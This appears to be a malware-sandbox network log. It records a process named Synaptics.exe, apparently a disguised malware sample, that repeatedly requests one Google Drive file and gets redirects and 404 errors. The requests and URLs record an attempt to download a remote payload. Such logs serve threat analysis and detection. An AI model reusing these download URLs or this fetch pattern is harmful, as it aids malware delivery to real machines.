                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:09 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HtwG9RhOmhP0ooQftt-trg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    107192.168.2.452135142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5w98vN_oUKKGUsqIppkXiyQkPbFyCLNb8jeum6dEbb6_Toy-3CN6m8kK3HjWEQ-qo2
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:09 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ncrFxwgbVkXAJvKWc78FEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 55 5f 46 72 7a 72 42 65 6b 2d 79 76 6a 67 75 78 38 72 79 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="cU_FrzrBek-yvjgux8ryKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    108192.168.2.452139142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ahy0LCm4zdwD5_iJJzprUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    109192.168.2.452142142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7uIISrm11Y8NJxpqqeVjZmZLhfFExp8-_DopIGCkxBc8V0RlmtFK2yu9WQeHcEoTBedR-Jkg4
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:10 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4BOFQh6NNkEXaDrYy1_Row' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:10 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 52 65 7a 65 34 36 52 4e 4f 73 4a 48 69 38 51 79 62 70 75 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="KReze46RNOsJHi8QybpumA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:10 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    110192.168.2.452145142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:10 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-qTju8xsRkmnwZc0Pxa3m6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    111192.168.2.452146142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4ewuQOrPtWoZFptIs4I1vK1bifW7RwEAmjD61ca8ng0WUxJIw-eW-j4TGBp1nUwOkM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:10 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-v731m41pq_vICxhWcPODKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:10 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:10 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 58 66 46 55 41 61 31 5a 50 46 36 47 52 59 48 71 69 44 38 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="KXfFUAa1ZPF6GRYHqiD8OA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:10 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    112192.168.2.452150142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:10 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:11 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dqkdQV5VcQhkkKnVCPXZtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    113192.168.2.452159142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
